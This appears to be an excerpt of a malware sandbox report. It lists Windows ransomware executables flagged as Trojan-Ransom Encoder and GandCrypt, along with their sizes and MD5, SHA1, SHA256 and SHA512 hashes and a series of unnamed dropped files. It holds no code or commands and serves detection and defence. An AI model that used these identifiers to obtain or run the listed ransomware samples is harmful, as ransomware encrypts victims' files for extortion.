C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe
Filesize411KB
MD58138a999883007fdf3bbd52e60eb20fd
SHA1affef4902cf3d49fb6aa0e96f0c32319d1952f40
SHA25611dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848
SHA5127fb260e82e332230ac373fcb33e8490cd81271d86fdc506bf16e6adc2ee14d479e33277b96cb2f795bae6fd77f5ddd654f42606ffcb9c51092dd4d472c6c682f
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Encoder.gen-147312e093c1a4f70f06fd0597f5f9bfd0c648c6d4b37be26f6bb956a1fc13bc.exe
Filesize2.4MB
MD592ce94c334333e757bdaf4c34c25642a
SHA19261300507a969c3e6ff19b634b0a554a06e38b4
SHA256147312e093c1a4f70f06fd0597f5f9bfd0c648c6d4b37be26f6bb956a1fc13bc
SHA5121f4b02edb3d6ff3c7667c5bac71ead57621224bbdb2b6b129179c4714cf86f9702cee73aeed025734432b1215ff2d0fc566d591331af2699c6de6094d6ca64c1
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3bca71282c685bf813ca9a3b51180fa51aecd6d7bf29638006da7b8fd4ba4022.exe
Filesize1.0MB
MD579b8d71a27c253c28fe34ad65edaba24
SHA1d57dcda8322ba701e65fef4278a98ef3895e80d4
SHA2563bca71282c685bf813ca9a3b51180fa51aecd6d7bf29638006da7b8fd4ba4022
SHA51239afb71f87ee835c2b31a4c8c336a7ee94773574e5a83ef8d0da4750c9d4446c42451bf85cec4d565fba88707dbb5adcc204735b363f506c0465b4c5483f61ab
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Gen.gen-50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03.exe
Filesize891KB
MD5cf5348d4f7fc5ec0598c8e15ea23ae89
SHA12c7e3dc275eb4077d9ea4fa47cad56b54fd41433
SHA25650416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03
SHA51264712d55c1a45d218ee433974396db8de0f54d8558fe4a4c7b75ad6ff9ab9b4101d0dbef2de7a0608382866bd9aa5d4e630d97694135d751d62870067f6ce7ec
-
Filesize
192B
MD54cb1a04be4a8f158bd30c80da609d4b3
SHA123e93b8549fcd653585aedf30504b652fc827362
SHA2569bdf6132b8c630cd38346765661f64398f4744a252640b9227e5257c03ceedb0
SHA51229b3b9ad8e73fad3713184edb460530e435a9340893dea56524f6390570f91e76dfa5783bd5f177f4733dba9c8ae87c13a534038e1d6242859483ba9e664d9a6
-
Filesize
96B
MD5896a2a5e076a314e20d56671cda2d1c7
SHA15c337f6af55139df4bbed6d744d8c9311bc197e4
SHA256a312014706090e40ff7b76e959e90aed8a9704402f531965ea616333d3e90620
SHA5129bfbdf3353971c9568871f1837f5fba61f4331c53ff02e7762198cbca2688b1f459363ee70b8d42cfbd1bb28674c609673bd71d1f5821491bfddcaa1767a37fb
-
Filesize
416B
MD59abbf046fb6d0793f6ae07ba9309f6d6
SHA14c883137f2f36b1580fce1dee0d42261cbe24bf4
SHA256a4a9d133329613103b63e30bf53aea00f742d3ed8489346def6af8ee92e6dc8a
SHA51216ed69f89e1142e7981fe150e37c91aed0e590e28944dd73875043788db04437b29979065ee99aa000a7c4b797959a12ea90d92f47c0ebfa816777ed6d88d805
-
Filesize
4B
MD5a54f0041a9e15b050f25c463f1db7449
SHA1d9be6524a5f5047db5866813acf3277892a7a30a
SHA256ad95131bc0b799c0b1af477fb14fcf26a6a9f76079e48bf090acb7e8367bfd0e
SHA512ea71bb243b0b2db729b9eb88e3c55a3f490fbff23457825051224a1fe6e6d3f480590cfa3a4a6b12c622d6ac366feb03cd17004ed004cb3f0d52731626946679
-
Filesize
1KB
MD5e9190822e4ab7bcd259fc94a1d64500c
SHA17b641ca730afe63999857a57b9e55db665c2c210
SHA256e033b53e0ee1c8a2ba7e81dfba2aab4909a68d652941c219f6536470d7305822
SHA512ebe9b0f82bddbed038d2d0054f9f18e367ef19087adf743a5bc60e12a16470f23f3b8da149d4e3adfbbf0313f0d6969917f0695be7165d51d3875ebe67918559
-
Filesize
68KB
MD5c80b43f726a182838e9baedeb1ddf66c
SHA14a8af85d45e0a1a62107b45989305b475c387b9a
SHA2565914f09546ad6d40a05fb5ed71498ec88279fd420279a6d9a802b1f8ec1b2423
SHA512d21569f3092a4c76adad58e9d77ea8f742b5f79357a7c89b98b12b7927562c52ed395b18e2c05e311308d8d033366a5a80e5e8ed91301cecd0a0211506f043e8
-
Filesize
7KB
MD53adffcf1b7349a7a0c60755379a4590e
SHA1cffda39be8074df5b3e1c0c1f7e9a8cf5e1f96d0
SHA2565711e3de134d4a61ab4daa6868c3cc61815162d9c350b457f5698d8bb3dcce09
SHA512086a328788b6710160dc570388eb82fb677dc61a4e9d4d65efea12d373b8ff0b3b4dcef35ca716c3eacfac30f24bd228b653a2d365c10d5cb468e63bbed280bf
-
Filesize
7KB
MD5db85564d8a291eeec6e97da18d83955d
SHA17afe2a9398e427a564c70d9995fc852c68311d2c
SHA2566941d2fc7b4d3b5bd3829935ffa81fd9bb26acd02f3121386119fc2a9b5fcdf0
SHA5123596fb17ca2332d218aa9b84f9c92eb4e48f4f3b29311d146f24a5ca1ed276060991279d9b3d6c67c9aba7a018332b3ad18e4ddddeee6920a713cfee2d7ec425
-
C:\Users\Public\Desktop\@[email protected]
Filesize736KB
MD5ecaa0e70e36efa31fe0fd0ab2fc5afe5
SHA1d08653aab9164b2bf6014f753daac8907784a2eb
SHA256b5591a3a4cfa9a05d97d3a89aca7ff6d2beb47296816f1e2f041d3ea6f134b7d
SHA512660c05764c8ff9de79ed076507386d189601150a18419f6dd9cf778b470afa2d230899f639f282e1f66fc19163bb1b5cf9a5255f241a980f92238268a68cb608
-
Filesize
7KB
MD5b6b623a9a5f7ec0e2ba5a68ec10a5561
SHA1f064b15158fd4200fc64025f3bcd54343b4fe98f
SHA2564df2280518e3b2eae32fc9e250be1118077fb432406c2f192a297b1c5b1f4a72
SHA512326a2f9b36caff66f40c6adb102ca1d42f4e4d7db8d4b1d559706780b9b4e483588d602ffe7886690b78b3d605660be174b89452637e8367a9a17630c353abbc
-
Filesize
6KB
MD5b93fbc85141f5d833dc2dabf3e566155
SHA1b191d80e4fd6c7708232951e6780e00322774950
SHA256a87ba6e1ab58f0fbce1056f379d5749f1aa5f96f2e3c535c5b523a99c1b63d59
SHA512954cfcd6827afbeb0943b34301faadf9a304fa5ea66c84054f4d26e252cff0982163a99f4544b81c7052924cc5a87a941169a03ffaea57bb3a3b0c5debaf5734
-
Filesize
1KB
MD5c4d7141070470eb93aeec6160d607d4f
SHA154e86fabff168c0ec8c9a012450e7e48ffcfecf5
SHA2569e11daff054fa9775965355467c27c931a0ef4602c34684c057438c10c18a153
SHA5121e203c4681208fa4d28d969227dda74e8a2ec50c83ea43f7c61fc613a0f2cd1e481f937afd435e20448b591215522fff80942580ea81bdf531dca4ed61b81b53
-
Filesize
21KB
MD58cc83221870dd07144e63df594c391d9
SHA13d409b39b8502fcd23335a878f2cbdaf6d721995
SHA25633bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
SHA512e7f964a10a8799310a519fa569d264f652e13cc7ea199792dc6a5c0507dec4a12844a87bf8bab714255dce717839908ed5d967ce8f65f5520fe4e7f9d25a622c
-
Filesize
789KB
MD5a47cf00aedf769d60d58bfe00c0b5421
SHA1656c4d285ea518d90c1b669b79af475db31e30b1
SHA2568dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
SHA5124c2dcad3bd478fa70d086b7426d55976caa7ffc3d120c9c805cbb49eae910123c496bf2356066afcacba12ba05c963bbb8d95ed7f548479c90fec57aa16e4637
-
Filesize
131KB
MD5a4600bcd1b6f9ea1420f8264cd7a4392
SHA1c5887f7c22f0abefb466e7147bec56e7ee4ed3d7
SHA25647146b7cdb23c55f96d74d16429528cb29a418297f3603a387f76fd78b5ccd37
SHA5121fa3b1f5a488b9e7a18bf9867dee1a7389fb57f059b0701c97e35cd1a9dd1c29e87b43fcfa1faacb4a2e13be0cf761aca26ce468a52c861d0950455bbbdc46a6
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
804B
MD5249a83440d0ed559cb7de26148de3e1a
SHA16b6f79f57172ac1eb1d9f3cf6af795cf2b4804ed
SHA2565ec9530aeda4738c032bd0999cf17c588da201c2dc45ae63d5ae57142bab6d60
SHA51233b36e4634f62e0111c1b82901015e3eafb6195b0e60ca3d5e6d3cb5b19a2a2d6f3a2fb48bf6f3776cee994e4c3cbfe89827b304f14f4f3def9cb629e7cdc95e